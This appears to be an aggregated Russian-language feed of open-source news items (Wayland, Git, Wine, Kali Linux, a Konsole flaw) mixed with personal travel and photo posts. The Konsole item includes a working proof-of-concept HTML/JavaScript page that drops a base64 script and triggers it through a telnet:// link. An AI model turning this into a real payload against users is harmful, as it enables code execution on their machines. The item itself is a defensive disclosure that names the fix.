Тем кто намерен использовать KiCad в окружениях с Wayland следует быть готовым к возможным зависаниям и аварийным завершениям, невозможности восстановить желаемую раскладку окон и ограничению функциональности интерфейса. Утверждается, что ограничения в функциональности вызваны отсутствием в Wayland возможностей, давно применяемых в приложениях для X11, Windows и macOS, таких как поддержка позиционирования окон и мгновенного перемещения указателя мыши (cursor warp).

Что касается возникающих сбоев, то они связываются с большой фрагментацией композитных серверов для Wayland. GNOME, KDE и обособленные композитные менеджеры по своему интерпретируют протоколы Wayland, поэтому полагаться при разработке на единую целостную реализацию протоколов Wayland и экспериментальные расширения проблематично. Разработчикам приложений приходится учитывать особенности каждого окружения и применять костыли для обхода проблем, специфичных для разных композитных менеджеров.

Фрагментация композитных серверов существенно увеличивает трудозатраты на реализацию поддержки Wayland. Отмечается, что самое неприятное в том, что разработчики KiCad не имеют возможности исправить возникающие проблемы своими силами, так как проблемы присутствуют не в KiСad, а в протоколах, оконных менеджерах и композитных серверах.

Учитывая, что Linux применяет лишь небольшая часть пользователей KiCad, решено избегать добавления в кодовую базу проекта костылей для обхода проблем, специфичных для оконных менеджеров, но при этом продолжать собирать KiCad для Wayland и тестировать сборки на совместимость. Все выявляемые проблемы и ограничения планируют документировать и доводить до сведения пользователей.

В системе отслеживания ошибок решено не разбирать жалобы от пользователей Wayland, связанные с позиционированием и размером окон, установкой фокуса, а также зависаниями, аварийными завершениями, повышенной нагрузке на CPU, проблемами с устройствами ввода и сбоями при отрисовке, не проявляющимися в сборке для X11.

Среди известных проблем, которые находятся вне зоны влияния разработчиков KiCad и которые не удаётся устранить на стороне KiCad:

• Проблемы с управлением окнами: Невозможность управления позицией окон и панелей (при открытии KiCad нельзя запомнить и восстановить положение окон и панелей инструментов). Проблемы с координацией работы одновременно с несколькими окнами. Ограничение возможности перемещения вкладок и панелей между разными областями.
• Проблемы с устройствами ввода: Возможность мгновенного перемещения курсора (cursor warping) завязана на необязательные экспериментальные расширения протокола, поддерживаемые лишь в отдельных композитных менеджерах. Непредсказуемое поведение при управлении фокусом ввода. Проблемы при использовании специализированных устройств ввода и при обработке горячих клавиш.
• Проблемы со стабильностью и производительностью: Повышенное потребление ресурсов и высокая нагрузка на CPU/GPU по сравнению с использованием X11. Появление графических артефактов при отрисовке и нарушение нормального вывода. Зависания и аварийные завершения, проявляющиеся только при работе в окружениях на базе Wayland. Ненадёжная работа с буфером обмена.
• Ограничения интерфейса пользователя: Проблемы с позиционированием, фокусом и взаимодействием в модальных диалогах. Проблемы с запуском внешних приложений и управления ими.

Дополнительно можно отметить прогресс в разработке проекта X11Libre, развивающего форк X.Org Server. За 10 дней с момента основания форка к разработке подключилось 11 участников, которые отправили 31 изменение. Энрико Вайгельт, автор форка, в свою очередь перенёс в форк 1267 своих изменений, не принятых в основной состав X.Org. Тем временем, разработчики X.Org откатили из кодовой базы X.Org Server 6 изменений, ранее принятых от Энрико Вайгельта и приводящих к регрессиям или связанных с пометкой некоторых возможностей устаревшими (всего до создания форка от Энрико в X.Org Server было принято 1568 изменений).

Кевин Кофлер (Kevin Kofler) из проекта Fedora, входящий в рабочую группу, занимающуюся сопровождением пакетов с KDE, предложил заменить в Fedora Linux пакет xorg-x11-xserver на реализацию X-сервера от форка XLibre. В качестве мотива замены упомянут переход на активно сопровождаемую кодовую базу вместо продолжения поставки устаревшего и почти не обновляемого проекта X.Org, который по заявлению его разработчиков почти остался без сопровождения. Автор форка был наиболее активным участником проекта X.Org Server и поставка форка будет выгодна создателям редакций Fedora, остающихся на X11, например, из-за добавления в X11Libre X11-расширения Xnamespace, обеспечивающего изоляцию клиентов на уровне пространств имён X11. Предложение пока не утверждено комитетом FESCo (Fedora Engineering Steering Committee), отвечающим за техническую часть разработки дистрибутива Fedora.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63419

#VibeCoding your MFA

У берегов Торонто есть несколько островов, куда ходит паром. Там огромный парк, где здорово гулять, кататься на велосипеде и рыбачить. А ещё там живут люди, дома которых утопают в зелени, садах и цветниках. И всё такое миленькое, как в детской книжке.

Дороги наши под облаками...
Беларусь.
#photography #WTphoto #travel #landscape #by #пейзаж #путешествия

Вижу, что по старинке пытаются учить зумеров всяким премудростям «взрослой жизни», представляя ситуацию как нечто объективное или неизбежное, тогда как порочная искусственность очевидна – молодёжь вынуждена ехать в мегаполисы просто чтоб не деградировать и не превратиться в замороженный фарш, а в мегаполисе они могут заниматься только «дерьмовой работой» без перспектив, которая никому не нужна, но без которой не выжить.
Так что понимают они всё правильно (хотя рыдать на камеру смысла не имеет).

Интересно, что при этой власти даже минимальный доход дело бы не поправил (хотя эта задумка мне нравится) – если немного подумать выживании «страны», «народа», «сказок на русском языке» и тп – потому что получатели дохода превратились бы в полурабов (по типу наших бюджетников), а сами суммы оседлали бы успешные манагеры.

Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)

В качестве причины изменения упоминается синхронизация с изменениями в основном проекте Wine, связанными с упрощением создания пакетов и сокращением цепочки зависимостей. Среди проблем, которые могут возникнуть после миграции на Wow64, упоминается снижение производительности OpenGL для 32-разрядных программ Windows и необходимость пересоздания существующих 32-разрядных префиксов Wine.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63418

Выпуск системы управления исходными текстами Git 2.50

По сравнению с прошлым выпуском в новую версию принято 621 изменение, подготовленное при участии 98 разработчиков, из которых 35 впервые участвуют в разработке. Основные новшества:

• Расширена возможность разделения на несколько pack-файлов базы недостижимых объектов ("cruft packs"), на которые в репозитории отсутствуют ссылки (не ссылаются ветки или теги). Использование нескольких мелких pack-файлов вместо одного крупного позволяет значительно сократить операции ввода/вывода при переупаковке репозиториев с большим числом недостижимых объектов, так как для каждой операции переупаковки не нужно перезаписывать все данные.

  В новой версии предложена опция "--combine-cruft-below-size", при помощи которой можно организовать объединение существующих pack-файлов, размер которых не превышает заданное значение. В отличие от ранее доступной опции "--max-cruft-size" новая опция "--combine-cruft-below-size" не ограничивает максимальный размер результирующего pack-файла, что позволяет более эффективно объединять pack-файлы в репозиториях с большим числом недостижимых объектов, разнесённых по нескольким pack-файлам.

• Добавлена экспериментальная поддержка инкрементального обновления многопакетных индексов MIDX (multi-pack index), при котором каждый слой MIDX-индекса c информацией о доступности объектов размещается в отдельном bitmap-файле. В очень крупных репозиториях реализованный вид индексов даёт возможность по мере поступления коммитов быстро и эффективно добавлять новые битовые карты доступности объектов.
• Из кодовой базы удалён старый движок выполнения операций слияния "recursive", на смену которому пришёл полностью переработанный движок "ORT" (Ostensibly Recursive’s Twin), более производительный, функциональный и удобный для сопровождения. ORT позволяет определить возможность объединения двух объектов, не создавая новых объектов в репозитории (при старом движке требовалось выполнение команды "git merge-tree --write-tree", записывающей новые объекты в репозиторий). В Git 2.50 в команде merge-tree реализована опция "--quiet", при которой возможность объединения можно проверить на основе кода возврата без записи данных в репозиторий.
• В "git cat-file --batch" и подобные команды добавлена опция "--filter", позволяющая пропустить некоторые объекты при выполнении операции.

     git cat-file --batch-check='%(objectname)' --filter='object:type=tree' 
  

• В команде "git maintenance" реализованы три новых действия: worktree-prune, rerere-gc и reflog-expire. Действие worktree-prune предназначено для удаления устаревших или повреждённых рабочих деревьев (worktrees) в репозитории. Действие rerere-gc удаляет старых записи, оставшиеся после устранения конфликтов слияния. Действие reflog-expire удаляет устаревшие недоступные объекты из reflog.
• Добавлена команда "git reflog drop", удаляющая все данные reflog для указанной ветки.
• Проведена оптимизация обработки и использования ссылок, например, реализовано кэширование префиксов ссылок, убраны лишние проверки при выполнении команды "git update-ref", повышена эффективность поиска существующих итераторов ссылок.
• Для библиотеки cURL добавлены настройки KeepAlive: http.keepAliveIdle, http.keepAliveInterval и http.keepAliveCount.
• В команде "git rev-list" реализована возможность вывода в формате, удобном для машинного разбора, при котором каждое поле разделено символом NUL.
• Язык Perl исключён из зависимостей, необходимых для утилит работы с документацией и выполнения тестового набора ("make test"). Многие Perl-однострочники в тестах заменены на функции shell или переписаны на языке Си.
• Добавлен userdiff-обработчик для формата файлов конфигурации ".ini".
• В команде send-email улучшена поддержка SMTP-сервера Outlook.

В новом видео Линдеманна снялась Полига Ауг. Хорошо!

Мы просим студентов читать, размышлять, писать и обсуждать идеи. Все это служит нашей цели — помочь им стать критически настроенными гражданами. GenAI может имитировать все шаги (...). Но это все равно, что пойти в спортзал и попросить робота поднять для вас тяжести

Опубликован защищённый дистрибутив Securonis Linux 3.0

Развиваемые проектом специфичные утилиты:

• Seconionis - прозрачный прокси для перенаправления трафика через Tor.
• I2P Router Menu - GUI для управления I2P Router.
• PxrtalCrypt - приложение для шифрования файлов.
• Securonis Notes - приложение для ведения зашифрованных заметок.
• Password Manager - менеджер паролей.
• Quick-USBKit - утилита для подключения, настройки и проверки USB-устройств.
• Open Mammoth - инструментарий для сетевой защиты.
• Wizard - утилита для очистки логов и заметания следов.
• VesperaCrypt - утилита для шифрования файлов.
• System Knight - сканирование системы на наличие следов руткитов и вредоносного ПО.
• System Manager - подборка возможностей для упрощения управления системой.
• FireScorpion Browser - сборка Firefox с усиленной защитой, вырезанием рекламы и блокированием отслеживания перемещений.
• Nevermore - утилита для безопасной очистки диска.
• Metadata Cleaner - утилита для удаления метаданных из файлов.
• ColdBootDef - утилита для очистки памяти перед завершением работы.
• SecDNSChanger - утилита для быстрой смены параметров в DNS.
• Securonis DNSCrypt - скрипт для упрощения использования DNSCrypt-Proxy.
• Paranoia - обеспечение полной изоляции системы и блокировки любой сетевой активности.
• PhysicalSec - инструментарий для защиты системы от совершения физических и аппаратных атак.
• Nuke2System - утилита для экстренной необратимой очистки всего содержимого.
• Securonis Data Destroyer - утилита для безопасного удаления файлов.

В новой версии:

• Прекращена поставка рабочего стола GNOME (оставлен только MATE). Удалены утилиты Symonitoring, Netraffic и Netxtrack.
• Режим паники разделён на три отдельные утилиты: Data Destroyer, Nuke2System и ColdBootDef.
• В состав включены собственные компоненты: PhysicalSec, FireScorpion Browser, System Knight и Password Manager.
• Переделан инструментарий для изоляции системы Paranoia.
• Предложены новые режимы "Performance" и "Extreme hardening", включающие настройки ядра для достижения максимальной производительности и безопасности.
• В состав включена утилита Speedtest для анализа пропускной способности сети.
• Обновлён интерфейс для настройки I2P.
• Ядро Linux обновлено до версии 6.12.30.

Выпуск дистрибутива для исследователей безопасности Kali Linux 2025.2

Kali предлагает подборку инструментов для специалистов в области компьютерной безопасности, включающую от средств для тестирования web-приложений и проникновения в беспроводные сети до программ для считывания данных с идентификационных RFID чипов. В комплект входит коллекция эксплоитов и около 400 специализированных утилит для проверки безопасности, таких как Aircrack, Maltego, SAINT, Kismet, Bluebugger, Btcrack, Btscanner, Nmap, p0f. Помимо этого, в дистрибутив входят средства для подбора паролей (Multihash CUDA Brute Forcer) и WPA ключей (Pyrit), использующие GPU NVIDIA и AMD для ускорения.

В новом выпуске:

• Полностью переделано меню приложений, структура которого приближена к классификатору базы знаний MITRE ATT&CK.
• Среда рабочего стола GNOME обновлена до версии 48.
• В сеанс GNOME добавлен индикатор, показывающий IP-адрес текущего VPN-соединения, который ранее поставлялся в сеансе на базе Xfce.
• Среда рабочего стола KDE обновлена до версии Plasma 6.3.
• Осуществлён переход с инструментария BloodHound Legacy, не обновлявшегося с 2023 года, на BloodHound Community Edition, применяемого для построения карты связей в сетях на базе контроллера домена Active Directory или Azure.

  В состав включены утилиты:

  • azurehound - коллектор данных в окружении Microsoft Azure для визуализации при помощи пакета BloodHound.
  • binwalk3 - инструментарий для анализа прошивок.
  • bloodhound-ce-python - коллектор на языке Python для BloodHound.
  • bopscrk - генератор словарей для подбора паролей.
  • chisel-common-binaries - готовые бинарный сборки chisel.
  • crlfuzz - утилита для проверки на уязвимости, связанные с подстановкой символов перевода строки или возврата каретки в HTTP-заголовки и параметры запроса.
  • donut-shellcode - генерация универсального shell-кода из содержимого в памяти.
  • gitxray - сбор данных о репозиториях в GitHub и участниках их разработки.
  • ldeep - утилита для перебора содержимого через LDAP.
  • ligolo-ng-common-binaries - готовые бинарный сборки ligolo-ng.
  • rubeus - утилита для низкоуровневой работы с Kerberos.
  • sharphound - коллектор данных для BloodHound CE.
  • tinja - утилита для тестирования web-страниц на возможность подстановки шаблонов.
• В состав всех графических сеансов добавлена утилита Xclip, позволяющая быстро поместить данные в буфер обмена из терминала.
• Обновлено окружение для мобильных устройств на базе платформы Android - NetHunter, с подборкой инструментов для тестирования систем на наличие уязвимостей. При помощи NetHunter возможна проверка осуществления атак, специфичных для мобильных устройств, например, через эмуляцию работы USB-устройств (BadUSB и HID Keyboard - эмуляция сетевого USB-адаптера, который может использоваться для MITM-атак, или USB-клавиатуры, выполняющей подстановку символов) и создание подставных точек доступа (MANA Evil Access Point). NetHunter устанавливается в штатное окружение платформы Android в форме chroot-образа, в котором выполняется специально адаптированный вариант Kali Linux.

  В новой версии реализована возможность проведения атак на Wi-Fi, подстановки кадров и захвата параметров согласования соединения WPA2, используя умные часы на базе чипов bcm43436b0, такие как TicWatch Pro 3. Обновлён инструментарий CARsenal (ранее CAN Arsenal) для осуществления атаки на автомобильные информационные системы. Обновлены варианты ядра для смартфонов Xiaomi Redmi 4/4X (A13), Xiaomi Redmi Note 11 (A15), Realme C15 (A10), Samsung Galaxy S10 (A14,A15/exynos9820) и Samsung Galaxy S9.

• Унифицированы и переведены на ядро Linux 6.12 сборки для Raspberry Pi.

@Konstantin
летом это выглядит уж слишком весело! совсем другое дело - зимой...

j2k25 hackathon report from kn@: installer, low battery, and more

Fresh from the recently concluded j2k25 hackathon comes this report from Klemens Nanni (kn@), who writes:

New country, lots of ramen, friends and new folks - heck, yes!

Having missed the last four (our five?, hard to tell…) hackathons, j2k25 aligned just right to finish our holidays with beautiful sights and culinary delights between streaks of hacking, leaving all else aside for a solid week - it was refreshing retreat and sparked plans to make another, even longer trip through Japan!

This time, I brought a few unfished and/or unanswered diffs, but also specifically wanted to look into unfamiliar code, now that folks were around to ask for advice and discuss with.

---

First, the installer and rc(8) were due for cleanup: common code for randomness seed files used by bootloaders and rc seemed unnecessarily different, so I synced their logic, style and comments wrt. subtle, yet important details around the sticky(8) bit:

Read more…

Старая узкоколейка.
Витебщина, Беларусь.
#photography #WTphoto #nature #travel #landscape #by #природа #пейзаж #путешествия

Отличная вещь для ремонта автомобилей!

Рассвет с косулями
#косули #roedeer #mastoanimal

Уязвимость в KDE Konsole, позволяющая выполнить код при открытии страницы в браузере

Для Konsole по умолчанию в KDE регистрируется сервис KTelnetService (ktelnetservice6.desktop), подключающий обработчики открываемых в бразузере URL-схем telnet://, rlogin:// и ssh://. При обработке данных схем в эмуляторе терминала запускаются утилиты telnet, rlogin и ssh, которым передаётся указанный в ссылке путь.

Уязвимость вызвана тем, что в случае, когда в системе не установлена утилита telnet, rlogin или ssh, Konsole при вызове соответствующего обработчика URL запускал командный интерпретатор bash. Например, если отсутствует telnet при открытии в браузере ссылки "telnet:///proc/self/cwd/Downloads/evil" в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil". По аналогии можно совершить атаку на обработчики rlogin:// и ssh:// при отсутствии в системе утилит rlogin и ssh.

Эксплуатации уязвимостей сопутствует то, что в конфигурации по умолчанию современные версии Firefox и Chrome автоматически сохраняют инициированные для загрузки файлы, не вывода запрос пользователю, а лишь показывая уведомление о факте состоявшейся загрузки. В Firefox подобное поведение можно отключить выставив настройку "Always ask you where to save files" на странице конфигуратора "General › Files and Applications". Как правило, файлы сохраняются в каталог ~/Downloads, на который не зная имени текущего пользователя можно сослаться через файловый путь "/proc/self/cwd/Downloads/".

Ниже показан пример JavaScript-кода, при выполнении которого в браузере в окружениях KDE с Konsole у пользователя будут выполнены команды "echo "Hello world"; touch /tmp/foobar" (в примере они закодированы в строке "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg=="). Предложенный код формирует ссылку с интегрированными данными, симулирует клик на эту ссылку и перебрасывает пользователя на URL "telnet://...". Для работы в Chrome следует изменить имя файла в ссылке на evil.txt, так как Chrome автоматически добавляет расширение txt.

    ‹html›
    ‹head›
        ‹script type="text/javascript"›

        function downloadAndRedirect() {
            const anchor = document.createElement('a');
            anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
            anchor.download = 'evil';
            document.body.appendChild(anchor);
            anchor.click();
            document.body.removeChild(anchor);

            setTimeout(() =› {
                window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
            }, 1000);
        }
        ‹/script›
    ‹/head›
    ‹body onload="downloadAndRedirect()"›
    ‹/body›
    ‹/html›

В Firefox при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя. В случае согласия KTelnetService запустит команду:

    /usr/bin/konsole --noclose -e telnet /proc/self/cwd/Downloads/evil

Если в системе нет утилиты telnet, Konsole откатится на запуск bash вместо telnet, передав изначально указанный в командной строке аргумент.

Проблема устранена в выпуске Konsole 25.04.2, вошедшем в состав обновления KDE Gear 25.04.2. Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD. В качестве обходных путей для блокирования уязвимости можно установить утилиты telnet, rlogin и ssh или удалить файл /usr/share/applications/ktelnetservice6.desktop.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63410

Съемочная группа сериала Фёдора Бондарчука «Трудно быть богом» покинула Иран через сухопутную границу Азербайджана в ночь на 14 июня.

Главная надежда теперь на то, что снять материал съёмочная группа не успела!

#кино

Госучреждения Дании уходят от продуктов Microsoft в пользу открытого ПО

Решения отказаться от использования Microsoft в роли основного поставщика ИТ-услуг также приняли муниципальные власти Копенгагена и Орхуса. В качестве причин перехода упоминаются финансовые предпосылки, нахождение в зависимости от компании, занимающей почти монопольное положение на рынке, и ухудшение геополитического климата из-за высказываний президента США о желании получить контроль над Гренландией. Финансовые предпосылки связаны с тем, что расходы на покупку ПО Microsoft за пять лет увеличились на 72% - с 313 миллионов крон в 2018 году до 538 миллионов крон в 2023 году.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63398

Район Kensington Market клёвый. Очень живой, красочный и эклетичный. Много муралов и встроенных в город арт-объектов. Маленькие магазинчики, едальни разных кухнонь, уличные прилавки, где мастера торгуют своими изделиями, лавочки с этническими продуктами, секонды.

Проект Nitrux прекращает разработку рабочего стола NX Desktop в пользу Hyprland

Одновременно упоминается о приостановке разработки собственной оболочки Maui Shell, так как проект столкнулся с нехваткой ресурсов и отсутствием интереса к разработке со стороны участников из сообщества. Ранее решено было не переводить NX Desktop на технологии KDE Plasma 6 и развивать собственную новую оболочку Maui Shell, которая со временем должна была заменить NX Desktop, но ситуация изменилась.

В соответствии с новым планом, дистрибутив Nitrux будет переведён на пользовательское окружение, построенное при помощи композитного сервера Hyprland, панели Waybar и меню завершения работы в системе Wlogout. Вместо дисплейного менеджера SDDM для запуска сеанса будут задействован менеджер входа greetd и экран входа QtGreet.

Композитный сервер Hyprland использует Wayland, поддерживает мозаичную (tiling) компоновку окон, классическое произвольное размещение окон, группировку окон в форме вкладок, псевдомозаичный режим и полноэкранное раскрытие окон. Среди возможностей: динамически создаваемые виртуальные рабочие столы; режимы компоновки элементов на экране; глобальная обработка горячих клавиш; управление жестами на тачпаде/сенсорном экране; средства для визуально насыщенных интерфейсов (градиенты в обрамлении окон, размытие фона, анимационные эффекты и тени); расширение через плагины.

Пакет с ядром Linux в дистрибутиве Nitrux решено перевести с использования патчей Liquorix на вариант ядра от проекта CachyOS. Причиной стало отсутствие в Liquorix патча для включения механизма PSI (Pressure Stall Information), позволяющего в пространстве пользователя анализировать сведения о времени ожидания получения различных ресурсов (CPU, память, ввод/вывод) для точной оценки уровня загруженности системы и характера замедления работы. Поддержка PSI необходима для работы Waydroid, прослойки для запуска Android-приложений.

Для установки дополнительных программ будут задействован инструментарий NX AppHub и формат AppBox, которые теперь преподносятся как более предпочтительные, по сравнению с пакетами AppImage. Обновления дистрибутива планируют публиковать два раза в месяц. Для установки обновлений продолжит использоваться утилита nuts (Nitrux Update Tool System). Из более отдалённых планов на будущее отмечена замена SquashFS на DwarFS и создание сборок для устройств ARM64, помимо ранее поддерживаемой архитектуры x86_64.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63408

Пью canadian boreal tea, про который мне рассказали, что он без кофеина и что вообще старый напиток, который тут ещё до колонизаторов пили. Делают его из листьев fireweed. Пошла я гуглить, что это такое … чуваки, в Канаде пьют ИВАН-ЧАЙ! 💖

По колеям бывших узкоколеек, по земляничным полянам, вдоль сокрытых за дачными участками братских могил, вдоль бывших торфяных и песочных карьеров, превратившихся в полноценные озёра, с таинственными островками, на которых гнездятся чайки и утки, а неизвестное существо плюхается в воду за твоей спиной. По рабочим дорогам, вымощенным кирпичами и мрамором, по деревянному настилу через волшебный лес до старой аллеи, где прячутся рыжие бельчата и стоит очень старый дуб.

#ЛенинградНутряной #спб

По колеям бывших узкоколеек, по земляничным полянам, вдоль сокрытых за дачными участками братских могил, вдоль бывших торфяных и песочных карьеров, превратившихся в полноценные озёра, с таинственными островками, на которых гнездятся чайки и утки, а неизвестное существо плюхается в воду за твоей спиной. По рабочим дорогам, вымощенным кирпичами и мрамором, по деревянному настилу через волшебный лес до старой аллеи, где прячутся рыжие бельчата и стоит очень старый дуб.

#ЛенинградНутряной #спб

Обнаружил такие нежные серно-жёлтые трутовики, что не удержался, набрал пакет и пожарил в сметане (после отваривания).
#грибы

В KDE добавлена поддержка Wayland-протокола xdg-pip

• Добавлена поддержка экспериментального Wayland-протокола xdg-pip (picture-in-picture), позволяющего корректно отображать постоянно видимые плавающие окна с мультимедийным контентом, такие как окно "картинка в картинке" в Firefox. Код для поддержки протокола xdg-pip на днях был добавлен в состав кодовой базы Firefox, на основе которой формируется выпуск 141.
• В конфигураторе настройки инвертирования и масштабирования перенесены на страницу "Accessibility", на которой они более уместны, чем на странице десктоп-эффектов.
• В программе для создания скриншотов Spectacle добавлена подсказка о возможности завершения записи скринкаста, нажатием комбинации клавиш, используемой для начала записи.
  
  
• В стилях Breeze обеспечена работа эффектов для анимации кликов на переключателях в приложениях на базе QtQuick и на страницах конфигуратора.
  
  
• Виджеты управления подключением устройств, установки сетевого соединения и настройки Bluetooth переведены на штатный стиль заголовков секций.
• При использовании Wayland реализована поддержка перегруппировки виртуальных рабочих столов через виджет Pager. Синхронизированы операции перегруппировки в обзорном режиме и виджете Pager.
• В KWin объединены взаимозависимые эффекты размытия (Blur) и изменения контраста фона (Background Contrast) - в эффекте Blur используется шейдер BackgroundContrast.
• Улучшен поиск в интерфейсе выбора Emoji - поле для поиска теперь показывается постоянно, а сам поиск охватывает полный набор символов, а не только содержимое текущей страницы.
• В KDE Gear 25.04.3 устранено аварийное завершение обработчика миниатюр (thumbnailer), возникавшее при использовании некоторых стилей виджетов на системах с X11.

Выпуск Wine 10.10 и DXVK 2.6.2

Наиболее важные изменения:

• Движок Wine Mono обновлён до выпуска 10.1.0. Wine Mono представляет собой дистрибутив Framework Mono, предназначенный для использования в Wine вместо проприетарного компонента .NET Framework.
• Убрана зависимость от библиотеки OSMesa (Off-screen Mesa).
• В реализации языка описания интерфейса WIDL (Wine Interface Definition Language) расширена поддержка генерации метаданных Windows Runtime (WinRT).
• Данные локализации обновлены до версии Unicode CLDR 47 (Unicode Common Locale Data Repository).
• В реализацию фреймворка Media Foundation добавлена поддержка формата P010.
• Обновлены версии faudio 25.06, mpg123 1.33.0, libpng 1.6.48 и xslt 1.1.43.
• Закрыты отчёты об ошибках, связанные с работой приложений: Lotus Freelance Graphics 2.1, HTML-Kit 292, cmd.exe, regedit, Baofeng5, Noteworthy Composer, Ricoh Digital Camera Utility 5, PlayOnline Viewer, HP Prime Virtual Calculator, Wondershare Uniconverter 13, AVCLabs Video Enhancer AI, Qt Installer, Smartsuite 3.1.
• Закрыты отчёты об ошибках, связанные с работой игр: Rise of Nations: Thrones and Patriots, Braid, Burger Shop, Horizon Chase, F.E.A.R, .T.A.L.K.E.R. Anomaly, The Fidelio Incident, Eador: Masters of the Broken World, Unreal 2, Vampyr, StarCraft Remastered.

Дополнительно можно отметить выпуск прослойки DXVK 2.6.2, предоставляющей реализацию DXGI (DirectX Graphics Infrastructure), Direct3D 8, 9, 10 и 11, работающую через трансляцию вызовов в API Vulkan. Для использования DXVK требуется наличие драйверов с поддержкой API Vulkan 1.3. DXVK может применяться для запуска 3D-приложений и игр в Linux при помощи Wine, выступая в качестве более высокопроизводительной альтернативы встроенных в Wine реализаций Direct3D, работающих поверх OpenGL.

В новой версии DXVK:

• Добавлена переменная окружения DXVK_FILTER_DEVICE_UUID для отсеивания устройств по UUID на системах с несколькими одинаковыми моделями GPU.
• Добавлены параметры конфигурации d3d9.hide{Amd,Intel,Nvidia}Gpu и улучшена логика переопределения идентификаторов GPU, что может быть полезным для запуска игр, отказывающихся запускаться на некоторых GPU или использующих на них урезанную функциональность.
• В dxvk-native улучшен выбор бэкенда WSI.
• Решены проблемы с некорректным обновлением стеревывода в некоторых игр для шлемов виртуальной реальности.
• Решены проблемы в играх Pirate Hunter, Red Orchestra: Ostfront, Rocketbirds 2 и Thumper.

User-space interrupts (2021) https://lobste.rs/s/hzlk4l #osdev
https://lwn.net/Articles/871113/

Прекращена разработка библиотеки управления памятью jemalloc

В 2009 году автор jemalloc перешёл на работу в компанию Facebook, в которой данная библиотека использовалась во внутренних проектах. В 2017 году автор jemalloc уволился из Facebook, а разработка была продолжена оставшейся командой из Facebook. После переименования в Meta приоритеты компании изменились, развитие библиотеки застопорилось и разработка сосредоточилась только на внутренних потребностях. Общедоступная кодовая база со временем деградировала и для устранения накопленного технического долга теперь требуется проведение значительного рефакторинга. Автор jemalloc не готов тратить своё время на подобный рефакторинг и поэтому решил свернуть разработку.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63405

Выпуск Wayland-Protocols 1.45

В состав Wayland-Protocols 1.45 включено 4 новых протокола (два в категории "staging" и два экспериментальных):

• ext-background-effect - применение эффектов к полупрозрачным частям Wayland-поверхности, таких как размытие фона.
• pointer-warp - позволяет приложению мгновенно переместить указатель в указанную позицию.
• session-management - восстановление состояния окон для прерванных сеансов (например, после аварийного завершения композитного менеджера).
• input-method - развитие нового протокола для использования методов ввода текста.

Все протоколы последовательно проходят фазы разработки, тестирования и стабилизации. После завершения стадии разработки (категория "unstable") протокол помещается в ветку "staging" и официально включается в состав набора wayland-protocols, а после завершения тестирования перемещается в категорию стабильных. Протоколы из категории "staging" уже можно применять в композитных серверах и клиентах, где требуется связанная с ними функциональность. В отличие от категории "unstable" в "staging" запрещено внесение изменений, нарушающих совместимость, но в случае выявление проблем и недоработок в ходе тестирования, не исключается замена новой значительной версией протокола или другим Wayland-расширением.

Для ускорения доведения протоколов до разработчиков и стимулирования ранней реализации протоколов в существующих проектах, начиная с позапрошлого выпуска дополнительно была добавлена фаза "experimental", в которой допускается внесение изменений, нарушающих совместимость, и добавление "сырых" протоколов, которые можно постепенно доводить до должного уровня. Если для попадания протокола в фазу "staging" требуется сформировать команду поддержки и получить определённое число подтверждений (ACK) от участников рецензирования, то для попадания в "experimental" достаточно отсутствия возражений (NACK) в течение двухнедельного периода рецензирования.

В настоящее время в состав набора wayland-protocols входят следующие стабильные протоколы, в которых обеспечивается обратная совместимость:

• "viewporter" - позволяет клиенту выполнять действия по масштабированию и обрезанию краёв поверхности на стороне сервера.
• "presentation-time" - обеспечивает отображение видео.
• "xdg-shell" - интерфейс создания и взаимодействия с поверхностями как с окнами, позволяющий передвигать их по экрану, сворачивать, разворачивать, изменять размер и т.д.
• "linux-dmabuf" - предоставляет возможности для создания wl_buffer-ов на базе DMA-BUF.
• "tablet" - организация ввода с графических планшетов.

Протоколы, тестируемые в ветке "staging":

• drm-lease - предоставляет ресурсы, необходимые для формирования стереокартинки с разными буферами для левого и правого глаза при выводе на шлемы виртуальной реальности.
• "ext-session-lock" - определяет средства блокировки сеанса, например, во время работы хранителя экрана или вывода диалога аутентификации.
• "single-pixel-buffer" - позволяет создавать однопиксельные буферы, включающие четыре 32-разрядных значения RGBA.
• "xdg-activation" - позволяет передать фокус между разными поверхностями первого уровня (например, при помощи xdg-activation одно приложение может переключить фокус на другое).
• content-type - позволяет клиентам передать композитному серверу сведения об отображаемом содержимом, которые могут использоваться для оптимизации поведения с учётом содержимого, например, выставлении специфичных DRM-свойств, таких как "content type". Заявлена поддержка следующих типов контента: none (нет сведений о типе данных), photo (вывод цифровых фото, требующий минимальной обработки), video (видео или анимация, требуется более точная синхронизация, чтобы исключить подтормаживания) и game (запуск игр, требуется вывод с минимальной задержкой).
• ext-idle-notify - даёт возможность композитным серверам передавать клиентам уведомления о неактивности пользователя, что может использоваться для активации дополнительных режимов энергосбережения после определённого времени неактивности.
• tearing-control - позволяет отключить в полноэкранных приложениях вертикальную синхронизацию (VSync) с кадровым гасящим импульсом, применяемую для защиты от появления разрывов при выводе (tearing). В мультимедийных приложениях появление артефактов из-за разрывов является нежелательным эффектом, но в игровых программах с артефактами можно смириться, если борьба с ними приводит к дополнительным задержкам.
• ext-foreign-toplevel-list - получение информации о поверхностях, размещённых на самом верхнем уровне (toplevel), которые позволяют организовать закрепление окон поверх другого содержимого, например, для подключения собственных панелей и переключателей окон.
• security-context - позволяет идентифицировать клиентов, использующих sandbox-изоляцию. Клиент может зарегистрировать новое подключение к композитному серверу на базе Wayland и прикрепить к нему контекст безопасности, после чего в соответствии с указанным контекстом безопасности композитный менеджер ограничит возможности, доступные для установленного соединения.
• cursor-shape - альтернативный способ настройки внешнего вида курсора, основанный на передаче серии изображений курсора вместо привязки к поверхности (wl_surface).
